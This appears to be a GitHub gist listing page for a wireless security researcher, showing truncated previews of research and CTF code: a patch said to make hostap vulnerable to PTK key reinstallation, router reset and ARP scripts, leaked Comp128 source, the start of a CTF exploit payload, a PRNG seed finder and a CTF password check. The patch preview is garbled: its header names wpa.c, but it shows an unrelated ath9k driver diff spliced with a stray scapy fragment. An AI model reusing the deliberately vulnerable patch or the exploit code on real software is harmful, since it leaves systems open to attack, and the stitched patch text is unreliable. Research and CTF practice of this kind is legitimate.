
vanhoefm / 0001-Make-hostap-vulnerable-to-PTK-key-reinstallation.patch
Created February 17, 2023 20:41
Make hostap 2.10 vulnerable to PTK key reinstallation
From b2393237de31be1799cb9026e30a5bf7b611f6e7 Mon Sep 17 00:00:00 2001
From: Mathy Vanhoef <[email protected]>
Date: Fri, 17 Feb 2023 21:38:06 +0100
Subject: [PATCH] Make hostap vulnerable to PTK key reinstallation
Apply this patch to hostap_2_10 to make it vulnerable to PTK key
reinstallations.
---
src/rsn_supp/wpa.c | 23 +++++++++++++++++++++++
1 file changed, 23 insertions(+)
diff --git a/drivers/net/wireless/ath/ath9k/htc_drv_main.c b/drivers/net/wireless/ath/ath9k/htc_drv_main.c
index d441045..84359c3 100644
--- a/drivers/net/wireless/ath/ath9k/htc_drv_main.c
+++ b/drivers/net/wireless/ath/ath9k/htc_drv_main.c
@@ -147,21 +147,26 @@ static void ath9k_htc_bssid_iter(void *data, u8 *mac, struct ieee80211_vif *vif)
struct ath9k_vif_iter_data *iter_data = data;
int i;
- for (i = 0; i < ETH_ALEN; i++)
- iter_data->mask[i] &= ~(iter_data->hw_macaddr[i] ^ mac[i]);
#!/usr/bin/python
from scapy.all import *
import random
# Number of times the probe for a single bit is (re)sent, to compensate for
# packet loss. How a "bit" is encoded is decided further down in the script
# (not visible in this preview).
ATTEMPTS_PER_BIT: int = 3
# Time to wait for an ACK after a probe, in seconds. Presumably used as the
# sniff timeout further down -- TODO confirm against the rest of the script.
SNIFFTIME: float = 0.1
vanhoefm / reset_router.py
Created June 21, 2020 01:25
Reset router using Selenium
#!/usr/bin/env python3
from selenium.webdriver import Firefox
from selenium.webdriver.firefox.options import Options
import subprocess, time
def reset_router(browser):
    """Trigger a factory reset of the router through its web UI.

    Args:
        browser: a Selenium WebDriver with the router's admin page already
            open (assumed; the caller and any login step are not visible in
            this preview).

    Only the first few statements of the function are visible here; the
    remainder is cut off in the gist preview.
    """
    # The router's admin page exposes its actions as JavaScript functions;
    # they are invoked directly instead of clicking through the UI.
    browser.execute_script('javascript:CheckHTMLStatus("System");')
    # Short pauses give the page's JS time to run before the next call; the
    # exact values look empirically tuned -- TODO confirm.
    time.sleep(0.13)
    browser.execute_script('javascript:SetFactory_Default();')
    time.sleep(0.01)
vanhoefm / wait_router.py
Last active June 21, 2020 01:18
Wait until the router has booted
#!/usr/bin/env python3
from scapy.all import *
# MAC address of our own interface; used below as the Ethernet and ARP
# source address. The value looks like a placeholder -- set it to the real
# address of the interface passed to wait_router().
MYMACADDR: str = "11:22:33:44:55:66"
def wait_router(iface, ip):
    """Wait until the router at *ip* is reachable again (per the gist description).

    Args:
        iface: name of the network interface to send/sniff on.
        ip: IPv4 address of the router to probe.

    Only the setup is visible in this preview: a raw L2 socket on *iface* and
    a broadcast ARP request for *ip* sourced from MYMACADDR / 192.168.0.100.
    The send/receive loop that follows is cut off, so the exact completion
    condition cannot be confirmed here.
    """
    # Raw layer-2 socket bound to the interface; presumably requires
    # elevated privileges -- TODO confirm.
    s = L2Socket(type=ETH_P_ALL, iface=iface)
    # Broadcast ARP "who-has ip" from our own MAC, with a hard-coded sender
    # IP on the 192.168.0.0/24 network.
    arp = Ether(dst="ff:ff:ff:ff:ff:ff", src=MYMACADDR)
    arp = arp/ARP(hwsrc=MYMACADDR, pdst=ip, psrc="192.168.0.100")
vanhoefm / comp128.c
Created February 5, 2016 23:30
Leaked Comp128 algorithm (versions 2 and 3) and a refactored, easier-to-understand version.
/** Comp128 version 2 and 3 overview by Mathy Vanhoef (based on other contributions mentioned inline) */
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <time.h>
static uint8_t table0[] = {
197, 235, 60, 151, 98, 96, 3, 100, 248, 118, 42, 117, 172, 211, 181, 203,
vanhoefm / csaw-ctf-2015_exploit-500.py
Created September 21, 2015 02:24
Solution for exploiting 500 challenge of CSAW CTF 2015
#!/usr/bin/env python2
from pwn import *
# Stack layout of vulnerable functions:
#
# [ buffer of some length ][canary][align1][align2][saved-ebp][return-addr][arg0-buffer][arg4-count]
#
# NOTE(review): only the first word of the payload is visible in this
# preview; the rest of the script is cut off.
payload = pack(0x08048740) # send function -> send(socket, &password, 0x100, 0)
vanhoefm / findseed
Created March 23, 2015 00:33
Find PRNG seed
#include <stdio.h>
#include <stdint.h>
/*
 * Return 1 if `seed` reproduces the 5-byte sequence in hexkey, else 0.
 *
 * The generator is a truncated LCG: x = (214013*x + 2531011) mod 2^24, and
 * the i-th output byte is the top byte of the 24-bit state (x >> 16). The
 * multiplier/increment match the well-known MSVC rand() constants, although
 * the 24-bit masking here differs from that implementation -- the exact
 * target generator is not stated on this page.
 *
 * Only the body is visible in this preview; the closing brace is cut off.
 */
int is_correct(uint32_t seed) {
    uint8_t hexkey[] = "\xA4\x3D\xF6\xF3\x74";  /* expected output bytes */
    for (uint32_t i = 0, x = seed; i < 5; ++i) {
        x = (214013 * x + 2531011) & 0xFFFFFF;  /* advance LCG, keep 24 bits */
        if (hexkey[i] != (x >> 16)) return 0;   /* output byte mismatch */
    }
    return 1;
vanhoefm / findseed
Created March 23, 2015 00:32
Find PRNG seed
#include <stdio.h>
#include <stdint.h>
/*
 * Debug variant of is_correct(): same 24-bit LCG check against hexkey, but
 * prints each intermediate state to stdout before comparing its top byte.
 *
 * Note the printf runs for every candidate seed, so this version is much
 * slower than the silent one when used in a brute-force loop.
 *
 * The function's return statement and closing brace are cut off in this
 * preview.
 */
int is_correct(uint32_t seed) {
    uint8_t hexkey[] = "\xA4\x3D\xF6\xF3\x74";  /* expected output bytes */
    for (uint32_t i = 0, x = seed; i < 5; ++i) {
        x = (214013 * x + 2531011) & 0xFFFFFF;  /* advance LCG, keep 24 bits */
        printf("%X\n", x);                      /* trace the state */
        if (hexkey[i] != (x >> 16)) return 0;   /* output byte mismatch */
    }
vanhoefm / good_crypto
Created March 22, 2015 17:49
Codegate 2015
function validate() {
var x = document.forms["formxx"]["pwz"].value;
if (!x.match(/^[A-Za-z]+$/))
return false;
if (!sha1(x).match(/^ff7b948953ac/))
return false;
alert("Flag: " + x);
return true;